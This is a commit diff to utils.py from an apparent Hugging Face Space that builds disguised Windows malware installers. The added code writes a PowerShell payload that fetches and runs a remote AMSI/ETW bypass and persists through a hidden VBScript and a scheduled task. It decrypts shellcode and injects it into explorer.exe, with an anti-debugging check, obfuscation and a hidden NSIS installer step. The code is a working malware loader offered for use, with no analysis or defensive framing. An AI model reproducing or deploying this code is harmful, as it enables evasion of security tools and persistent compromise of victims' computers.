Spaces:
Sleeping
Sleeping
Update utils.py
Browse files
utils.py
CHANGED
|
@@ -30,7 +30,7 @@ def obfuscate_powershell_script(ps1_path):
|
|
| 30 |
current_app.logger.info(f"Running obfuscation command: {cmd}")
|
| 31 |
current_app.logger.info(f"Input PowerShell script path: {ps1_path}")
|
| 32 |
|
| 33 |
-
process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
|
| 34 |
process.stdin.write(f"{ps1_path}\n")
|
| 35 |
process.stdin.flush()
|
| 36 |
stdout, stderr = process.communicate()
|
|
@@ -93,7 +93,7 @@ def generate_nsi_script(folder_path, bin_file, ps1_file):
|
|
| 93 |
SetOutPath "$WINDIR\..\ProgramData\Installer"
|
| 94 |
File "{bin_file}"
|
| 95 |
File "{ps1_file}"
|
| 96 |
-
ExecShell "
|
| 97 |
SetAutoClose true
|
| 98 |
SectionEnd
|
| 99 |
"""
|
|
@@ -213,17 +213,114 @@ def process_request(request):
|
|
| 213 |
# Extract the file name from the full binary path
|
| 214 |
bin_file_name = os.path.basename(bin_path)
|
| 215 |
|
| 216 |
-
|
| 217 |
-
|
| 218 |
-
|
| 219 |
-
|
| 220 |
-
|
| 221 |
-
|
| 222 |
-
|
| 223 |
-
#
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 224 |
ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
|
| 225 |
-
with open(ps1_path, 'w') as
|
| 226 |
-
|
| 227 |
|
| 228 |
# Obfuscate the PowerShell script
|
| 229 |
obfuscated_ps1_path = obfuscate_powershell_script(ps1_path)
|
|
|
|
| 30 |
current_app.logger.info(f"Running obfuscation command: {cmd}")
|
| 31 |
current_app.logger.info(f"Input PowerShell script path: {ps1_path}")
|
| 32 |
|
| 33 |
+
process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, text=True)
|
| 34 |
process.stdin.write(f"{ps1_path}\n")
|
| 35 |
process.stdin.flush()
|
| 36 |
stdout, stderr = process.communicate()
|
|
|
|
| 93 |
SetOutPath "$WINDIR\..\ProgramData\Installer"
|
| 94 |
File "{bin_file}"
|
| 95 |
File "{ps1_file}"
|
| 96 |
+
ExecShell "" "$WINDIR\..\ProgramData\Installer\\Verification.ps1" SW_HIDE
|
| 97 |
SetAutoClose true
|
| 98 |
SectionEnd
|
| 99 |
"""
|
|
|
|
| 213 |
# Extract the file name from the full binary path
|
| 214 |
bin_file_name = os.path.basename(bin_path)
|
| 215 |
|
| 216 |
+
# Create the PowerShell script with the provided content
|
| 217 |
+
ps1_content = f'''
|
| 218 |
+
# Download and execute the script from the provided URL
|
| 219 |
+
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/BlackShell256/Null-AMSI/refs/heads/main/Invoke-NullAMSI.ps1)
|
| 220 |
+
# Run the Invoke-NullAMSI command
|
| 221 |
+
Invoke-NullAMSI
|
| 222 |
+
Invoke-NullAMSI -etw
|
| 223 |
+
# Define the content of the VBScript
|
| 224 |
+
$vbsContent = @'
|
| 225 |
+
Set objShell = CreateObject("WScript.Shell")
|
| 226 |
+
objShell.Run "powershell -EP Bypass -File \\"C:\\ProgramData\\Installer\\Verification.ps1\\"", 0, True
|
| 227 |
+
'@
|
| 228 |
+
# Define the file path for the .vbs file in the desired location
|
| 229 |
+
$vbsFilePath = "C:\\ProgramData\\Installer\\0.vbs"
|
| 230 |
+
# Write the content to the .vbs file
|
| 231 |
+
$vbsContent | Set-Content -Path $vbsFilePath -Encoding ASCII
|
| 232 |
+
Write-Host "VBScript file created at: $vbsFilePath"
|
| 233 |
+
$Action = New-ScheduledTaskAction -Execute "C:\\ProgramData\\Installer\\0.vbs"
|
| 234 |
+
$Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration (New-TimeSpan -Days 365)
|
| 235 |
+
Register-ScheduledTask -TaskName "HiPPo Setting" -Action $Action -Trigger $Trigger -Force
|
| 236 |
+
# Define a fixed 16-byte key for encryption (fixed key as "MyFixedEncryptionKey")
|
| 237 |
+
$keyBytes = [System.Text.Encoding]::UTF8.GetBytes("MyFixedEncryptionKey")
|
| 238 |
+
# Ensure the key length is 16 bytes (AES requires 16, 24, or 32 bytes)
|
| 239 |
+
if ($keyBytes.Length -gt 16) {{
|
| 240 |
+
$keyBytes = $keyBytes[0..15] # Trim the key to 16 bytes if it's longer
|
| 241 |
+
}}
|
| 242 |
+
elseif ($keyBytes.Length -lt 16) {{
|
| 243 |
+
# If the key is too short, pad it with zeros to make it 16 bytes
|
| 244 |
+
$keyBytes = $keyBytes + (New-Object Byte[] (16 - $keyBytes.Length))
|
| 245 |
+
}}
|
| 246 |
+
# Function to download the encrypted binary from the server
|
| 247 |
+
function Download-EncryptedShellcode {{
|
| 248 |
+
param([string]$url)
|
| 249 |
+
# Download the encrypted binary file directly into memory as a byte array
|
| 250 |
+
$response = Invoke-WebRequest -Uri $url -UseBasicParsing
|
| 251 |
+
return $response.Content
|
| 252 |
+
}}
|
| 253 |
+
# Read the encrypted shellcode from a local binary file
|
| 254 |
+
$encryptedBuf = [System.IO.File]::ReadAllBytes("C:\\ProgramData\\Installer\\{bin_file_name}")
|
| 255 |
+
# Create an AES encryption object
|
| 256 |
+
$aes = [System.Security.Cryptography.Aes]::Create()
|
| 257 |
+
# Set the decryption key and initialization vector (IV)
|
| 258 |
+
$aes.Key = $keyBytes
|
| 259 |
+
$aes.IV = $keyBytes[0..15] # Use the first 16 bytes of the key for the IV
|
| 260 |
+
# Create a memory stream to hold the decrypted data
|
| 261 |
+
$memoryStream = New-Object System.IO.MemoryStream
|
| 262 |
+
$cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $aes.CreateDecryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write)
|
| 263 |
+
# Decrypt the encrypted data into the memory stream
|
| 264 |
+
$cryptoStream.Write($encryptedBuf, 0, $encryptedBuf.Length)
|
| 265 |
+
$cryptoStream.Close()
|
| 266 |
+
# Get the decrypted shellcode
|
| 267 |
+
$buf = $memoryStream.ToArray()
|
| 268 |
+
# Anti-debugging mechanism
|
| 269 |
+
function IsDebuggerPresent {{
|
| 270 |
+
$IsDebuggerPresentCode = @"
|
| 271 |
+
using System;
|
| 272 |
+
using System.Runtime.InteropServices;
|
| 273 |
+
public class DebugHelper {{
|
| 274 |
+
[DllImport(\\"kernel32.dll\\")]
|
| 275 |
+
public static extern bool IsDebuggerPresent();
|
| 276 |
+
}}
|
| 277 |
+
"@
|
| 278 |
+
$debugHelper = Add-Type -TypeDefinition $IsDebuggerPresentCode -PassThru
|
| 279 |
+
return $debugHelper::IsDebuggerPresent()
|
| 280 |
+
}}
|
| 281 |
+
if (IsDebuggerPresent) {{
|
| 282 |
+
Write-Host "Debugger detected. Exiting."
|
| 283 |
+
exit
|
| 284 |
+
}}
|
| 285 |
+
# Inject shellcode into a target process (example: explorer.exe)
|
| 286 |
+
$Win32APICode = @"
|
| 287 |
+
using System;
|
| 288 |
+
using System.Runtime.InteropServices;
|
| 289 |
+
public class Win32API {{
|
| 290 |
+
[DllImport(\\"kernel32.dll\\", SetLastError = true, ExactSpelling = true)]
|
| 291 |
+
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
| 292 |
+
[DllImport(\\"kernel32.dll\\", SetLastError = true)]
|
| 293 |
+
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);
|
| 294 |
+
[DllImport(\\"kernel32.dll\\", SetLastError = true)]
|
| 295 |
+
public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out IntPtr lpThreadId);
|
| 296 |
+
[DllImport(\\"kernel32.dll\\", SetLastError = true)]
|
| 297 |
+
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
|
| 298 |
+
[DllImport(\\"kernel32.dll\\", SetLastError = true)]
|
| 299 |
+
[return: MarshalAs(UnmanagedType.Bool)]
|
| 300 |
+
public static extern bool CloseHandle(IntPtr hObject);
|
| 301 |
+
}}
|
| 302 |
+
"@
|
| 303 |
+
$win32api = Add-Type -TypeDefinition $Win32APICode -PassThru
|
| 304 |
+
# Target process (explorer.exe) injection
|
| 305 |
+
$targetProcess = Get-Process explorer | Select-Object -First 1
|
| 306 |
+
$processHandle = $win32api::OpenProcess(0x1F0FFF, $false, $targetProcess.Id)
|
| 307 |
+
# Allocate memory in the target process
|
| 308 |
+
$size = 0x1000
|
| 309 |
+
if ($buf.Length -gt $size) {{ $size = $buf.Length }}
|
| 310 |
+
$remoteMemory = $win32api::VirtualAllocEx($processHandle, [IntPtr]::Zero, $size, 0x3000, 0x40)
|
| 311 |
+
# Write the shellcode into the allocated memory
|
| 312 |
+
$bytesWritten = [IntPtr]::Zero
|
| 313 |
+
$win32api::WriteProcessMemory($processHandle, $remoteMemory, $buf, $buf.Length, [ref]$bytesWritten)
|
| 314 |
+
# Create a remote thread to execute the shellcode
|
| 315 |
+
$threadId = [IntPtr]::Zero
|
| 316 |
+
$win32api::CreateRemoteThread($processHandle, [IntPtr]::Zero, 0, $remoteMemory, [IntPtr]::Zero, 0, [ref]$threadId)
|
| 317 |
+
# Close the process handle
|
| 318 |
+
$win32api::CloseHandle($processHandle)
|
| 319 |
+
Write-Host "Shellcode injection completed successfully."
|
| 320 |
+
'''
|
| 321 |
ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
|
| 322 |
+
with open(ps1_path, 'w') as ps1_file:
|
| 323 |
+
ps1_file.write(ps1_content)
|
| 324 |
|
| 325 |
# Obfuscate the PowerShell script
|
| 326 |
obfuscated_ps1_path = obfuscate_powershell_script(ps1_path)
|